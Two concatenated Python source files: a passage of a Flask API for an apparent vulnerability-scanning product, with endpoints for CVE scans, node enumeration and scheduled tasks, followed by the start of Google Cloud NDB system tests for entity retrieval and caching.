raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_STOP, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
return set_response(data=node.cve_scan_stop())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STOP,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STOP, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STATUS, methods=["GET"],
endpoint="api_v1_5_cve_status")
@jwt_required
def cve_status(node_id):
"""
Node Control API - CVE Status
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: cveStatus
description: CVE Status for a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_cve_status())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STATUS,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STATUS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ATTACK_PATH, methods=["GET"],
endpoint="api_v1_5_attack_path")
@jwt_required
def get_attack_path(node_id):
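    """Get the attack path for a node (applicable node types - `host`, `container`, `container_image`)."""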
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_attack_path())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ATTACK_PATH, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ATTACK_PATH, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<node_id>", methods=["GET"], endpoint="api_v1_5_node_details")
@jwt_required
def get_node_detail(node_id):
"""
Node Details API
---
tags:
- Node Control
security:
- Bearer: []
operationId: nodeDetails
description: Get full details of a node (hosts, containers, images, processes) by node_id
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node(node_id)
return set_response(node.node_details_formatted)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/enumerate_filters", methods=["GET"], endpoint="api_v1_5_enumerate_filters")
@jwt_required
def enumerate_node_filters():
"""
Enumerate Filters API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateFilters
description: Get filter options for enumerate nodes api
parameters:
- name: node_type
in: query
type: string
required: true
description: Node type
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
- name: resource_type
in: query
type: string
required: true
description: Resource type
enum: [cve]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
# number, time_unit, lucene_query_string => used in vulnerability filters, not topology
number = request.args.get("number")
time_unit = request.args.get("time_unit")
if bool(number is not None) ^ bool(time_unit):
raise InvalidUsage("Require both number and time_unit or ignore both of them.")
if number:
try:
number = int(number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if time_unit and time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
lucene_query_string = request.args.get("lucene_query")
if lucene_query_string:
lucene_query_string = urllib.parse.unquote(lucene_query_string)
node_types_str = str(request.args.get("node_type", ''))
node_types = []
if node_types_str:
node_types = node_types_str.split(",")
filters_needed = request.args.get("filters", None)
resource_types_str = str(request.args.get('resource_type', ''))
resource_types = []
if resource_types_str:
resource_types = resource_types_str.split(",")
resource_filters = []
for resource_type in resource_types:
if resource_type not in [constants.CVE_INDEX]:
print('Invalid resource_type {}. Skipping'.format(resource_type))
continue
if resource_type == constants.CVE_INDEX:
# Get `container` info from `cve` and `host` / `container_image` data from `cve-scan`
cve_aggs = {"cve_container_name": {
"terms": {"field": "cve_container_name.keyword", "size": constants.ES_TERMS_AGGR_SIZE}}}
cve_filters = {"type": constants.CVE_INDEX}
cve_aggs_query = ESConn.aggregation_helper(
constants.CVE_INDEX, cve_filters, cve_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, get_only_query=True)
cve_scan_aggs = {
"node_type": {
"terms": {"field": "node_type.keyword", "size": 10},
"aggs": {"node_id": {"terms": {"field": "node_id.keyword", "size": ES_TERMS_AGGR_SIZE}},
"node_status": {"terms": {"field": "action.keyword", "size": ES_TERMS_AGGR_SIZE}}}
}
}
cve_scan_aggs_query = ESConn.aggregation_helper(
constants.CVE_SCAN_LOGS_INDEX, {"action": ["COMPLETED", "ERROR"]}, cve_scan_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, add_masked_filter=False,
get_only_query=True)
search_queries = [
{"index": constants.CVE_INDEX}, cve_aggs_query,
{"index": constants.CVE_SCAN_LOGS_INDEX}, cve_scan_aggs_query
]
aggs_responses = ESConn.msearch(search_queries).get("responses", [])
filters_actions = []
filters_host_name = []
filters_container_name = []
filters_image_name = []
for container_bkt in aggs_responses[0].get("aggregations", {}).get(
"cve_container_name", {}).get("buckets", []):
if container_bkt["key"] and container_bkt["key"] not in filters_container_name:
filters_container_name.append(container_bkt["key"])
for node_type_bkt in aggs_responses[1].get("aggregations", {}).get("node_type", {}).get("buckets", []):
for node_id_bkt in node_type_bkt.get("node_id", {}).get("buckets", []):
if node_type_bkt["key"] == constants.NODE_TYPE_HOST:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_host_name:
filters_host_name.append(node_id_bkt["key"])
elif node_type_bkt["key"] == constants.NODE_TYPE_CONTAINER_IMAGE:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_image_name:
filters_image_name.append(node_id_bkt["key"])
for scan_action_bkt in node_type_bkt.get("node_status", {}).get("buckets", []):
if scan_action_bkt["key"] and scan_action_bkt["key"] not in filters_actions:
filters_actions.append(scan_action_bkt["key"])
if filters_host_name:
details = {"label": "Hostname", "name": "host_name", "options": filters_host_name, "type": "string"}
if node_types:
if constants.NODE_TYPE_HOST in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_image_name:
details = {"label": "Image Name", "name": "image_name_with_tag", "options": filters_image_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER_IMAGE in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_container_name:
details = {"label": "Container Name", "name": "container_name", "options": filters_container_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_actions:
details = {"label": "Status", "name": "action", "options": filters_actions, "type": "string"}
resource_filters.append(details)
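            # For the topology lookup below, restrict the query to host nodes and only
            # fetch the kubernetes_cluster_name filter; the other filter options for
            # this resource type were already built from the aggregations above.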
node_types = [constants.NODE_TYPE_HOST]
filters_needed = "kubernetes_cluster_name"
if filters_needed:
filters_needed = str(filters_needed).split(",")
if not node_types:
raise InvalidUsage("node_type is required")
filter_keys = []
for node_type in node_types:
if node_type not in constants.NODE_TYPES_ALL:
raise InvalidUsage("node_type '{0}' is invalid".format(node_type))
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
registry_id = request.args.get("registry_id")
if not registry_id:
raise InvalidUsage("registry_id is required")
filter_keys.append("{0}{1}:{2}".format(constants.TOPOLOGY_FILTERS_PREFIX, node_type.upper(), registry_id))
else:
filter_keys.append(constants.TOPOLOGY_FILTERS_PREFIX + node_type.upper())
from config.redisconfig import redis
topology_filters = redis.mget(filter_keys)
response = {"filters": []}
added_filters = {}
added_count = 0
for topology_filter in topology_filters:
if not topology_filter:
continue
filter_items = json.loads(topology_filter)
for item in filter_items:
to_add = False
if filters_needed:
if item["name"] in filters_needed:
to_add = True
else:
to_add = True
if to_add:
if item["name"] in added_filters:
found_index = added_filters[item["name"]]
tmp_options = list(set(item["options"] + response["filters"][found_index]["options"]))
response["filters"][found_index]["options"] = tmp_options
else:
response["filters"].append(item)
added_filters[item["name"]] = added_count
added_count += 1
merged_filters = []
# if node_types are passed remove filters generated by resource_type which are not applicable to node_types
if resource_filters and response.get('filters'):
merged_filters = resource_filters + response.get('filters')
# merged_filters = list(filter(lambda x: x.get('name') in [y.get('name') for y in response.get('filters')],
# resource_filters))
elif node_types and response.get('filters'):
merged_filters = response.get('filters')
else:
merged_filters = resource_filters
filter_index = {}
for resource_filter in merged_filters:
if resource_filter.get('name') in filter_index:
existing_resource_filter = filter_index[resource_filter.get('name')]
existing_options = set(existing_resource_filter.get('options'))
current_options = set(resource_filter.get('options'))
new_options = current_options - existing_options
updated_options = existing_resource_filter.get('options') + list(new_options)
existing_resource_filter['options'] = updated_options
else:
filter_index[resource_filter.get('name')] = resource_filter
all_filters = [value for value in filter_index.values()]
all_filters.sort(key=lambda x: x.get('name'))
return set_response(data={'filters': all_filters})
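# Illustrative note on the merge above (hypothetical values): two filter entries that
# share a name have their options unioned, e.g.
#   [{"name": "host_name", "options": ["dev-1"]}, {"name": "host_name", "options": ["dev-2"]}]
# collapses into a single {"name": "host_name", "options": ["dev-1", "dev-2"]} entry,
# and the final list is sorted by name.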
@resource_api.route("/scheduled_tasks", methods=["GET"], endpoint="api_v1_5_scheduled_tasks_list")
@jwt_required
def list_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: getScheduledTasks
description: Get list of all scheduled tasks
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
scheduled_tasks = Scheduler.query.order_by(Scheduler.created_at.asc()).all()
if not scheduled_tasks:
scheduled_tasks = []
response = {"scheduled_tasks": [{
"id": task.id, "created_at": str(task.created_at), "action": task.action, "description": task.description,
"cron": task.cron_expr, "status": task.status, "last_ran_at": str(task.last_ran_at),
"node_names": task.node_names, "is_enabled": task.is_enabled, "node_type": task.nodes.get("node_type", "")
} for task in scheduled_tasks]}
return set_response(data=response)
@resource_api.route("/scheduled_tasks/update", methods=["POST"], endpoint="api_v1_5_scheduled_tasks_update")
@jwt_required
@non_read_only_user
def update_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: updateScheduledTasks
description: Enable, disable or delete scheduled tasks
parameters:
- in: body
name: Options
description: Options to enable, disable or delete scheduled tasks
schema:
type: object
properties:
action:
type: string
enum: [enable, disable, delete]
description: Action to perform - `enable`, `disable` or `delete`
scheduled_task_id_list:
type: array
uniqueItems: true
required: true
description: List of scheduled task ids
example: [1,3,5]
items:
type: integer
responses:
201:
description: Updated successfully.
400:
description: Bad request.
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
action = request.json.get("action", "enable")
if action not in ["enable", "disable", "delete"]:
raise InvalidUsage("action must be enable, disable or delete")
scheduled_task_id_list = request.json.get("scheduled_task_id_list")
if not scheduled_task_id_list:
raise InvalidUsage("scheduled_task_id_list is required")
if type(scheduled_task_id_list) != list:
raise InvalidUsage("scheduled_task_id_list must be list")
if action == "delete":
Scheduler.bulk_delete_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)))
else:
is_enabled = True
if action == "disable":
is_enabled = False
Scheduler.bulk_update_schedules(Scheduler.query.filter(Scheduler.id.in_(scheduled_task_id_list)), is_enabled)
return set_response(status=201)
@resource_api.route("/node_action", methods=["POST"], endpoint="api_v1_5_node_action")
@jwt_required
def node_action():
"""
Node Action API
---
tags:
- Node Action
security:
- Bearer: []
operationId: nodeAction
description: Start or schedule scan, get reports, etc for a set of nodes
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
node_type:
type: string
required: true
description: Node type
enum: [host, container, container_image, registry_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
action:
type: string
required: true
              description: Action to perform
enum: [cve_scan_start, cve_scan_status, schedule_vulnerability_scan, download_report, send_report]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
raise InvalidUsage("Missing JSON post data in request")
node_type = post_data.get("node_type", None)
if node_type not in constants.NODE_BULK_ACTIONS:
raise InvalidUsage("node_type {0} not supported".format(node_type))
action = post_data.get("action", None)
if action not in constants.NODE_BULK_ACTIONS[node_type]:
raise InvalidUsage("action {0} not supported for node_type {1}".format(action, node_type))
current_user = get_jwt_identity()
user = User.query.filter_by(id=current_user["id"]).one_or_none()
if action != constants.NODE_ACTION_DOWNLOAD_REPORT:
if user.role.name not in [constants.USER_ROLES.ADMIN_USER, constants.USER_ROLES.NORMAL_USER]:
raise Forbidden("User not permitted to perform this action")
node_ids = post_data.get("node_id_list", [])
if type(node_ids) != list:
node_ids = []
registry_images = post_data.get("registry_images", {})
if type(registry_images) != dict:
registry_images = {}
from config.redisconfig import redis
df_id_to_scope_id_map = {}
topology_data_df_format = {}
include_dead_nodes = bool(post_data.get("include_dead_nodes", False))
node_action_details = {"node_type": node_type, "include_dead_nodes": include_dead_nodes,
"file_type": post_data.get("file_type", "xlsx")}
action_args = post_data.get("action_args", {})
if action_args and type(action_args) != dict:
raise InvalidUsage("action_args should be in json format")
if not action_args:
action_args = {}
accepted_action_args = ["cron", "description", "scan_type", "filters", "resources",
"report_email", "duration", "registry_credentials", "delete_resources"]
action_args = {k: v for k, v in action_args.items() if k in accepted_action_args}
filters = action_args.get("filters", {})
if type(filters) != dict:
raise InvalidUsage("action_args.filters must be a json")
if filters:
node_action_details["filters"] = filters
# "filters", "resources", "report_email" - for download report / send report
# resources - [{"type":"cve","filter":{"cve_severity":["critical"]}}]
report_resources = action_args.get("resources", [])
if type(report_resources) != list:
raise InvalidUsage("action_args.resources must be list")
if report_resources:
node_action_details["resources"] = report_resources
report_email = action_args.get("report_email", "")
if report_email:
node_action_details["report_email"] = str(report_email)
report_duration = action_args.get('duration', {})
if report_duration and type(report_duration) != dict:
raise InvalidUsage("action_args.duration must be json")
if report_duration:
duration_number = report_duration.get('number')
duration_time_unit = report_duration.get('time_unit')
if duration_number:
try:
duration_number = int(duration_number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if duration_time_unit and duration_time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
node_action_details["duration"] = {"number": duration_number,
"time_unit": constants.TIME_UNIT_MAPPING.get(duration_time_unit)}
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
if not registry_images:
raise InvalidUsage("registry_images is required for node_type registry_image")
if not registry_images.get("registry_id") or type(registry_images["registry_id"]) != int:
raise InvalidUsage("registry_id is required in registry_images key")
if not filters and not registry_images.get("image_name_with_tag_list"):
raise InvalidUsage("image_name_with_tag_list is required in registry_images key")
if registry_images.get("image_name_with_tag_list") and type(
registry_images["image_name_with_tag_list"]) != list:
raise InvalidUsage("image_name_with_tag_list must be a list")
for img in registry_images["image_name_with_tag_list"]:
if not img:
raise InvalidUsage("image_name_with_tag_list must not have empty values")
try:
RegistryCredential.query.get(registry_images["registry_id"])
except:
raise InternalError("Failed to get registry credential {}".format(registry_images["registry_id"]))
node_action_details["registry_images"] = registry_images
else:
if not filters and not node_ids:
raise InvalidUsage("node_id_list is required for node_type {0}".format(node_type))
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
# Temporarily accept scope_id
node_utils = NodeUtils()
node_ids = [node_utils.get_df_id_from_scope_id(scope_id, node_type) for scope_id in node_ids]
node_action_details["node_id_list"] = node_ids
if action in [constants.NODE_ACTION_CVE_SCAN_START, constants.NODE_ACTION_SCHEDULE_CVE_SCAN]:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
scan_types = action_args.get("scan_type", None)
if not scan_types or type(scan_types) != list:
raise InvalidUsage("scan_type is required and it should be list")
if "base" not in scan_types:
scan_types.append("base")
invalid_scan_types = set(scan_types) - set(constants.CVE_SCAN_TYPES)
if invalid_scan_types:
raise InvalidUsage("scan_type has invalid values: {0}".format(", ".join(invalid_scan_types)))
node_action_details["scan_type"] = scan_types
elif action == constants.NODE_ACTION_CVE_SCAN_STOP:
if node_type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER,
constants.NODE_TYPE_CONTAINER_IMAGE, constants.NODE_TYPE_REGISTRY_IMAGE]:
raise InvalidUsage("action {0} not applicable for node_type {1}".format(action, node_type))
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not filters:
raise InvalidUsage("filters is required for this action")
if not report_resources:
raise InvalidUsage("resources is required for this action")
if action == constants.NODE_ACTION_SCHEDULE_SEND_REPORT and not report_email:
raise InvalidUsage("report_email is required for schedule_send_report action")
node_action_details_user_activity = deepcopy(node_action_details)
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
# TODO: get the image names
pass
else:
node_names = []
for node_id in node_ids:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
if node.name:
node_names.append(node.name)
except:
pass
node_action_details_user_activity["node_id_list"] = node_names
from tasks.user_activity import create_user_activity
create_user_activity.delay(current_user["id"], constants.ACTION_BULK, action,
resources=[node_action_details_user_activity], success=True)
if action in [constants.NODE_ACTION_CVE_SCAN_START]:
from config.app import celery_app
celery_app.send_task(
'tasks.common_worker.common_worker', args=(), queue=constants.CELERY_NODE_ACTION_QUEUE,
kwargs={"action": action, "node_action_details": node_action_details, "task_type": "node_task"})
elif action in [constants.NODE_ACTION_DOWNLOAD_REPORT]:
from tasks.task_scheduler import run_node_task
return run_node_task(action, node_action_details)
elif action in [constants.NODE_ACTION_SCHEDULE_CVE_SCAN, constants.NODE_ACTION_SCHEDULE_SEND_REPORT]:
if not action_args.get("cron"):
raise InvalidUsage("cron is required in action_args key")
if not croniter.is_valid(action_args["cron"]):
raise InvalidUsage("cron is invalid")
node_names = ""
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
node_names = ", ".join(registry_images["image_name_with_tag_list"][:3])
if len(registry_images["image_name_with_tag_list"]) > 3:
node_names += " and more"
else:
tmp_node_names = []
for node_id in node_ids[:3]:
try:
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
tmp_node_names.append(node.name)
except:
pass
node_names = ", ".join(tmp_node_names)
if len(node_ids) > 3:
node_names += " and more"
try:
check_existing = Scheduler.query.filter_by(action=action, nodes=node_action_details).all()
if check_existing:
raise InvalidUsage("A similar schedule already exists")
scheduled_action = Scheduler(
action=action, description=str(action_args.get("description", "")), cron_expr=action_args["cron"],
nodes=node_action_details, is_enabled=True, node_names=node_names, status="")
scheduled_action.save()
except Exception as exc:
return set_response(error="Could not save scheduled task: {}".format(exc), status=400)
return set_response("Ok")
return set_response("Ok")
@resource_api.route("/enumerate", methods=["POST"], endpoint="api_v1_5_enumerate")
@jwt_required
def enumerate_node():
"""
Enumerate API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateNodes
description: Enumerate nodes (hosts, containers, images, processes) with optional filters
parameters:
- in: body
name: Options
description: Options to enumerate nodes
schema:
type: object
properties:
size:
type: integer
default: 10
minimum: 1
maximum: 100000
example: 10
              description: The number of nodes to return
sort_by:
type: string
example: name
description: Field to sort by
sort_order:
type: string
example: asc
enum: [asc, desc]
description: Sort order
fields:
type: array
example: ["name"]
description: Respond only selected fields
start_index:
type: integer
minimum: 0
maximum: 99999
example: 0
default: 0
description: The number of items to skip before starting to collect the result set
filters:
              description: Filter nodes by various fields (key value pairs)
type: object
properties:
type:
type: array
uniqueItems: true
description: Types of node
example: ["host"]
items:
type: string
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
pseudo:
type: array
uniqueItems: true
description: Pseudo node or not
example: [false]
items:
type: boolean
enum: [true, false]
kernel_version:
type: array
uniqueItems: true
description: Kernel version (for type `host`)
example: ["4.13.0-1019-gcp #23-Ubuntu SMP Thu May 31 16:13:34 UTC 2018"]
items:
type: string
host_name:
type: array
uniqueItems: true
description: Host names
example: ["dev-1", "dev-2"]
items:
type: string
os:
type: array
uniqueItems: true
description: Operating system (for type `host`)
example: ["linux"]
items:
type: string
local_networks:
type: array
uniqueItems: true
description: Local networks in CIDR format (for type `host`)
example: ["127.0.0.1/8", "172.17.0.1/16"]
items:
type: string
interfaceNames:
type: array
uniqueItems: true
description: Interface names (for type `host`)
example: ["lo", "docker0", "eth0"]
items:
type: string
publicIpAddress:
type: array
uniqueItems: true
description: Public IP of host (for type `host`)
example: ["1.2.3.4"]
items:
type: string
kubernetes_node_type:
type: array
uniqueItems: true
                  description: Kubernetes node type (for type `kube_controller`)
                  example: ["Deployment"]
items:
type: string
enum: [Deployment, DaemonSet, ReplicaSet, CronJob, StatefulSet]
kubernetes_namespace:
type: array
uniqueItems: true
description: kubernetes namespace (for type `pod`, `kube_controller`, `kube_service`). Empty means all.
example: ["default"]
items:
type: string
enum: [default, "", kube-public, kube-system]
tags:
type: array
uniqueItems: true
description: User defined tags
example: ["prod"]
items:
type: string
container_name:
type: array
uniqueItems: true
description: Container name (for type `container`, `container_image`)
example: ["redis", "mysql"]
items:
type: string
image_name:
type: array
uniqueItems: true
description: Container image names (for type `container`, `container_image`)
example: ["redis:latest", "mysql:latest"]
items:
type: string
pid:
type: integer
minimum: 1
description: Process ID (for type `process`)
example: 1225
ppid:
type: integer
minimum: 1
description: Parent process ID (for type `process`)
example: 1225
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
post_data = request.json
if not post_data:
post_data = {}
return set_response(data=resource.get_enumerate_node_data(post_data))
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/status", methods=["POST"], endpoint="api_v1_5_status_api")
@jwt_required
def status_api():
"""
Status API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: statusApi
description: Get status of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
              description: Status ID returned by a previous request. If a request takes longer to process, the API replies with a status id; use this id to query the status of that request. Once the status is success, the response includes the data url where the result is available.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
properties:
data_url:
type: string
description: Data API url path
id:
type: string
description: id to use when calling data api
status:
type: string
description: If status is `success`, then data is available
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
status_id_encoded = request.json.get("id", None)
if not status_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(status_id_encoded))
status = getattr(resource, status_id["type"] + "_status")(status_id["params"], status_id["post_data"])
response = {
"id": status_id_encoded,
"status": status
}
if status == "success":
response["data_url"] = "{0}/data".format(constants.API_URL_PREFIX)
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
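# Hypothetical client-side flow for the status/data endpoint pair (api_url, headers
# and status_id are placeholders, not part of this module):
#   r = requests.post(api_url + "/status", json={"id": status_id}, headers=headers).json()
#   if r["data"]["status"] == "success":
#       result = requests.post(api_url + "/data", json={"id": status_id}, headers=headers).json()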
@resource_api.route("/data", methods=["POST"], endpoint="api_v1_5_data_api")
@jwt_required
def data_api():
"""
Data API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: dataApi
description: Get data of a previous request by status_id
parameters:
- in: body
name: Options
description: Options
schema:
type: object
properties:
id:
type: string
              description: Status ID returned by the previous status API call. If a request takes longer to process, the API replies with a status id; use this id to query the status of that request. Once the status is success, the response includes the data url where the result is available.
required: true
example: "qwkfjwqfkwqkf"
responses:
200:
description: Request success
properties:
data:
type: object
description: Response data
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON in request")
if type(request.json) != dict:
raise InvalidUsage("Request data invalid")
data_id_encoded = request.json.get("id", None)
if not data_id_encoded:
raise InvalidUsage("id is required.")
status_id = json.loads(resource.decrypt(data_id_encoded))
data = getattr(resource, status_id["type"] + "_data")(status_id["params"], status_id["post_data"])
response = {
"id": data_id_encoded,
"data": data,
}
return set_response(data=response)
except Exception as ex:
raise InternalError(str(ex))
|
test_crud.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
System tests for Create, Update, Delete. (CRUD)
"""
import datetime
import functools
import operator
import os
import threading
import zlib
try:
from unittest import mock
except ImportError:
import mock
import pytest
import test_utils.system
from google.cloud import ndb
from google.cloud.ndb import _cache
from google.cloud.ndb import global_cache as global_cache_module
from tests.system import KIND, eventually
USE_REDIS_CACHE = bool(os.environ.get("REDIS_CACHE_URL"))
def _equals(n):
return functools.partial(operator.eq, n)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
def test_retrieve_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
assert key.get() is entity
def test_retrieve_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none", baz=b"night")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
cache_dict = global_cache_module._InProcessGlobalCache.cache
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
cache_key = _cache.global_cache_key(key._key)
assert cache_key in cache_dict
        patch = mock.patch(
            "google.cloud.ndb._datastore_api._LookupBatch.add",
            side_effect=Exception("Shouldn't call this"),
        )
with patch:
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
